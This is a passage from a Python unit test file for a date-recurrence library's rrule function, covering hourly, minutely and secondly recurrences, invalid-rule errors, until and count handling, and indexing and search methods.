datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 3, 6, 0, 6)])
def testHourlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testHourlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testHourlyBySetPos(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byminute=(15, 45),
bysecond=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 15, 45),
datetime(1997, 9, 2, 9, 45, 15),
datetime(1997, 9, 2, 10, 15, 45)])
def testMinutely(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 1),
datetime(1997, 9, 2, 9, 2)])
def testMinutelyInterval(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 2),
datetime(1997, 9, 2, 9, 4)])
def testMinutelyIntervalLarge(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
interval=1501,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 10, 1),
datetime(1997, 9, 4, 11, 2)])
def testMinutelyByMonth(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 0, 0),
datetime(1997, 9, 3, 0, 1),
datetime(1997, 9, 3, 0, 2)])
def testMinutelyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 0, 0),
datetime(1998, 1, 5, 0, 1),
datetime(1998, 1, 5, 0, 2)])
def testMinutelyByWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 1),
datetime(1997, 9, 2, 9, 2)])
def testMinutelyByNWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 1),
datetime(1997, 9, 2, 9, 2)])
def testMinutelyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByYearDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 0, 1),
datetime(1997, 12, 31, 0, 2),
datetime(1997, 12, 31, 0, 3)])
def testMinutelyByYearDayNeg(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 0, 1),
datetime(1997, 12, 31, 0, 2),
datetime(1997, 12, 31, 0, 3)])
def testMinutelyByMonthAndYearDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 0, 1),
datetime(1998, 4, 10, 0, 2),
datetime(1998, 4, 10, 0, 3)])
def testMinutelyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 0, 1),
datetime(1998, 4, 10, 0, 2),
datetime(1998, 4, 10, 0, 3)])
def testMinutelyByWeekNo(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 0, 0),
datetime(1998, 5, 11, 0, 1),
datetime(1998, 5, 11, 0, 2)])
def testMinutelyByWeekNoAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 0, 0),
datetime(1997, 12, 29, 0, 1),
datetime(1997, 12, 29, 0, 2)])
def testMinutelyByWeekNoAndWeekDayLarge(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 0, 1),
datetime(1997, 12, 28, 0, 2)])
def testMinutelyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 0, 1),
datetime(1997, 12, 28, 0, 2)])
def testMinutelyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 0, 0),
datetime(1998, 12, 28, 0, 1),
datetime(1998, 12, 28, 0, 2)])
def testMinutelyByEaster(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 0, 0),
datetime(1998, 4, 12, 0, 1),
datetime(1998, 4, 12, 0, 2)])
def testMinutelyByEasterPos(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 0, 0),
datetime(1998, 4, 13, 0, 1),
datetime(1998, 4, 13, 0, 2)])
def testMinutelyByEasterNeg(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 0, 0),
datetime(1998, 4, 11, 0, 1),
datetime(1998, 4, 11, 0, 2)])
def testMinutelyByHour(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 2, 18, 1),
datetime(1997, 9, 2, 18, 2)])
def testMinutelyByMinute(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 2, 10, 6)])
def testMinutelyBySecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 2, 9, 1, 6)])
def testMinutelyByHourAndMinute(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 3, 6, 6)])
def testMinutelyByHourAndSecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 2, 18, 1, 6)])
def testMinutelyByMinuteAndSecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testMinutelyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testMinutelyBySetPos(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bysecond=(15, 30, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 15),
datetime(1997, 9, 2, 9, 0, 45),
datetime(1997, 9, 2, 9, 1, 15)])
def testSecondly(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 1),
datetime(1997, 9, 2, 9, 0, 2)])
def testSecondlyInterval(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 2),
datetime(1997, 9, 2, 9, 0, 4)])
def testSecondlyIntervalLarge(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
interval=90061,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 3, 10, 1, 1),
datetime(1997, 9, 4, 11, 2, 2)])
def testSecondlyByMonth(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 0, 0, 0),
datetime(1997, 9, 3, 0, 0, 1),
datetime(1997, 9, 3, 0, 0, 2)])
def testSecondlyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 0, 0, 0),
datetime(1998, 1, 5, 0, 0, 1),
datetime(1998, 1, 5, 0, 0, 2)])
def testSecondlyByWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 1),
datetime(1997, 9, 2, 9, 0, 2)])
def testSecondlyByNWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 1),
datetime(1997, 9, 2, 9, 0, 2)])
def testSecondlyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByYearDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0, 0),
datetime(1997, 12, 31, 0, 0, 1),
datetime(1997, 12, 31, 0, 0, 2),
datetime(1997, 12, 31, 0, 0, 3)])
def testSecondlyByYearDayNeg(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0, 0),
datetime(1997, 12, 31, 0, 0, 1),
datetime(1997, 12, 31, 0, 0, 2),
datetime(1997, 12, 31, 0, 0, 3)])
def testSecondlyByMonthAndYearDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0, 0),
datetime(1998, 4, 10, 0, 0, 1),
datetime(1998, 4, 10, 0, 0, 2),
datetime(1998, 4, 10, 0, 0, 3)])
def testSecondlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0, 0),
datetime(1998, 4, 10, 0, 0, 1),
datetime(1998, 4, 10, 0, 0, 2),
datetime(1998, 4, 10, 0, 0, 3)])
def testSecondlyByWeekNo(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 0, 0, 0),
datetime(1998, 5, 11, 0, 0, 1),
datetime(1998, 5, 11, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 0, 0, 0),
datetime(1997, 12, 29, 0, 0, 1),
datetime(1997, 12, 29, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDayLarge(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0, 0),
datetime(1997, 12, 28, 0, 0, 1),
datetime(1997, 12, 28, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0, 0),
datetime(1997, 12, 28, 0, 0, 1),
datetime(1997, 12, 28, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 0, 0, 0),
datetime(1998, 12, 28, 0, 0, 1),
datetime(1998, 12, 28, 0, 0, 2)])
def testSecondlyByEaster(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 0, 0, 0),
datetime(1998, 4, 12, 0, 0, 1),
datetime(1998, 4, 12, 0, 0, 2)])
def testSecondlyByEasterPos(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 0, 0, 0),
datetime(1998, 4, 13, 0, 0, 1),
datetime(1998, 4, 13, 0, 0, 2)])
def testSecondlyByEasterNeg(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 0, 0, 0),
datetime(1998, 4, 11, 0, 0, 1),
datetime(1998, 4, 11, 0, 0, 2)])
def testSecondlyByHour(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 0),
datetime(1997, 9, 2, 18, 0, 1),
datetime(1997, 9, 2, 18, 0, 2)])
def testSecondlyByMinute(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 0),
datetime(1997, 9, 2, 9, 6, 1),
datetime(1997, 9, 2, 9, 6, 2)])
def testSecondlyBySecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 2, 9, 1, 6)])
def testSecondlyByHourAndMinute(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 0),
datetime(1997, 9, 2, 18, 6, 1),
datetime(1997, 9, 2, 18, 6, 2)])
def testSecondlyByHourAndSecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 2, 18, 1, 6)])
def testSecondlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testSecondlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testSecondlyByHourAndMinuteAndSecondBug(self):
# This explores a bug found by Mathieu Bridon.
self.assertEqual(list(rrule(SECONDLY,
count=3,
bysecond=(0,),
byminute=(1,),
dtstart=datetime(2010, 3, 22, 12, 1))),
[datetime(2010, 3, 22, 12, 1),
datetime(2010, 3, 22, 13, 1),
datetime(2010, 3, 22, 14, 1)])
def testLongIntegers(self):
if not PY3: # There is no longs in python3
self.assertEqual(list(rrule(MINUTELY,
count=long(2),
interval=long(2),
bymonth=long(2),
byweekday=long(3),
byhour=long(6),
byminute=long(6),
bysecond=long(6),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 2, 5, 6, 6, 6),
datetime(1998, 2, 12, 6, 6, 6)])
self.assertEqual(list(rrule(YEARLY,
count=long(2),
bymonthday=long(5),
byweekno=long(2),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(2004, 1, 5, 9, 0)])
def testHourlyBadRRule(self):
"""
When `byhour` is specified with `freq=HOURLY`, there are certain
combinations of `dtstart` and `byhour` which result in an rrule with no
valid values.
See https://github.com/dateutil/dateutil/issues/4
"""
self.assertRaises(ValueError, rrule, HOURLY,
**dict(interval=4, byhour=(7, 11, 15, 19),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testMinutelyBadRRule(self):
"""
See :func:`testHourlyBadRRule` for details.
"""
self.assertRaises(ValueError, rrule, MINUTELY,
**dict(interval=12, byminute=(10, 11, 25, 39, 50),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testSecondlyBadRRule(self):
"""
See :func:`testHourlyBadRRule` for details.
"""
self.assertRaises(ValueError, rrule, SECONDLY,
**dict(interval=10, bysecond=(2, 15, 37, 42, 59),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testMinutelyBadComboRRule(self):
"""
Certain values of :param:`interval` in :class:`rrule`, when combined
with certain values of :param:`byhour` create rules which apply to no
valid dates. The library should detect this case in the iterator and
raise a :exception:`ValueError`.
"""
# In Python 2.7 you can use a context manager for this.
def make_bad_rrule():
list(rrule(MINUTELY, interval=120, byhour=(10, 12, 14, 16),
count=2, dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertRaises(ValueError, make_bad_rrule)
def testSecondlyBadComboRRule(self):
"""
See :func:`testMinutelyBadComboRRule' for details.
"""
# In Python 2.7 you can use a context manager for this.
def make_bad_minute_rrule():
list(rrule(SECONDLY, interval=360, byminute=(10, 28, 49),
count=4, dtstart=datetime(1997, 9, 2, 9, 0)))
def make_bad_hour_rrule():
list(rrule(SECONDLY, interval=43200, byhour=(2, 10, 18, 23),
count=4, dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertRaises(ValueError, make_bad_minute_rrule)
self.assertRaises(ValueError, make_bad_hour_rrule)
def testBadUntilCountRRule(self):
"""
See rfc-5545 3.3.10 - This checks for the deprecation warning, and will
eventually check for an error.
"""
with self.assertWarns(DeprecationWarning):
rrule(DAILY, dtstart=datetime(1997, 9, 2, 9, 0),
count=3, until=datetime(1997, 9, 4, 9, 0))
def testUntilNotMatching(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 5, 8, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testUntilMatching(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 4, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testUntilSingle(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0)])
def testUntilEmpty(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 1, 9, 0))),
[])
def testUntilWithDate(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=date(1997, 9, 5))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testWkStIntervalMO(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=2,
byweekday=(TU, SU),
wkst=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testWkStIntervalSU(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=2,
byweekday=(TU, SU),
wkst=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testDTStartIsDate(self):
self.assertEqual(list(rrule(DAILY,
count=3,
dtstart=date(1997, 9, 2))),
[datetime(1997, 9, 2, 0, 0),
datetime(1997, 9, 3, 0, 0),
datetime(1997, 9, 4, 0, 0)])
def testDTStartWithMicroseconds(self):
self.assertEqual(list(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0, 0, 500000))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testMaxYear(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=2,
bymonthday=31,
dtstart=datetime(9997, 9, 2, 9, 0, 0))),
[])
def testGetItem(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[0],
datetime(1997, 9, 2, 9, 0))
def testGetItemNeg(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[-1],
datetime(1997, 9, 4, 9, 0))
def testGetItemSlice(self):
self.assertEqual(rrule(DAILY,
# count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[1:2],
[datetime(1997, 9, 3, 9, 0)])
def testGetItemSliceEmpty(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[:],
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testGetItemSliceStep(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[::-2],
[datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 2, 9, 0)])
def testCount(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)).count(),
3)
def testCountZero(self):
self.assertEqual(rrule(YEARLY,
count=0,
dtstart=datetime(1997, 9, 2, 9, 0)).count(),
0)
def testContains(self):
rr = rrule(DAILY, count=3, dtstart=datetime(1997, 9, 2, 9, 0))
self.assertEqual(datetime(1997, 9, 3, 9, 0) in rr, True)
def testContainsNot(self):
rr = rrule(DAILY, count=3, dtstart=datetime(1997, 9, 2, 9, 0))
self.assertEqual(datetime(1997, 9, 3, 9, 0) not in rr, False)
def testBefore(self):
self.assertEqual(rrule(DAILY, # count=5
dtstart=datetime(1997, 9, 2, 9, 0)).before(datetime(1997, 9, 5, 9, 0)),
datetime(1997, 9, 4, 9, 0))
def testBeforeInc(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.before(datetime(1997, 9, 5, 9, 0), inc=True),
datetime(1997, 9, 5, 9, 0))
def testAfter(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.after(datetime(1997, 9, 4, 9, 0)),
datetime(1997, 9, 5, 9, 0))
def testAfterInc(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.after(datetime(1997, 9, 4, 9, 0), inc=True),
datetime(1997, 9, 4, 9, 0))
def testXAfter(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0))
.xafter(datetime(1997, 9, 8, 9, 0), count=12)),
[datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 9, 17, 9, 0),
datetime(1997, 9, 18, 9, 0),
datetime(1997, 9, 19, 9, 0),
